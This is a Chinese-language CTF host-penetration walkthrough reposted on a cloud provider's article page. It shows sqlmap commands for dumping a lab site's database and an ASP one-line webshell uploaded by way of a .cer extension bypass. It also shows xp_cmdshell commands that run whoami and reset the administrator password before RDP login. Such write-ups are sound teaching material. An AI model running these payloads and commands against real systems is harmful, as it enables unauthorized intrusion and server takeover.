CTF主机渗透是实例分析

发布时间:2022-01-07 16:08:39 作者:iii
来源:亿速云 阅读:161

本文小编为大家详细介绍“CTF主机渗透是实例分析”,内容详细,步骤清晰,细节处理妥当,希望这篇“CTF主机渗透是实例分析”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。

第一步:我们访问链接:http://202.0.0.23/

进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法提交的参数名为SortID,值为1,我们尝试一下是否存在sql注入,通过sqlmap去跑一下。

CTF主机渗透是实例分析

发现存在sql注入漏洞
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

CTF主机渗透是实例分析 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

CTF主机渗透是实例分析 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

CTF主机渗透是实例分析

查看账号密码的数据库表

CTF主机渗透是实例分析

对b2076528346216b3进行md5解密,解密得密码为admin1234账号为root
第二步:接下来使用御剑后台扫描,找到后台登录页面

右键此页面查看源码,找到一个flag:<!--flag2{890b0c4958ef57e9264a9d2703ea7e8c}-->

CTF主机渗透是实例分析 

第三步:使用账户root密码admin1234登录后台,在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马,一句话木马内容:<%eval request("caidao")%>  (按照asp一句话木马格式)

CTF主机渗透是实例分析

结果提示上传文件格式不对,想下绕过办法 

CTF主机渗透是实例分析

这里我们将一句话木马文件改一个可执行的后缀.cer

CTF主机渗透是实例分析

则上传成功
第四步:下面我们直接上菜刀工具了

CTF主机渗透是实例分析

在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

CTF主机渗透是实例分析 

在数据库配置文件中找到数据库的账号密码

CTF主机渗透是实例分析 

使用一句话木马连接mssql数据库

CTF主机渗透是实例分析

利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell 'whoami'

CTF主机渗透是实例分析

当前cmdshell的权限是system权限,所以直接修改administrator的密码为hacker:EXEC master..xp_cmdshell 'net user administrator 123456'

CTF主机渗透是实例分析

第五步:直接远程桌面连接服务器administrator/123456,在桌面发现flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

读到这里,这篇“CTF主机渗透是实例分析”文章已经介绍完毕,想要掌握这篇文章的知识点还需要大家自己动手实践使用过才能领会,如果想了解更多相关内容的文章,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. RouterOS的后渗透研究是怎样的
  2. BugKu CTF怎么用

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

ctf

上一篇:Bash中的&符号和文件描述符如何理解

下一篇:c++显式栈如何实现递归

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》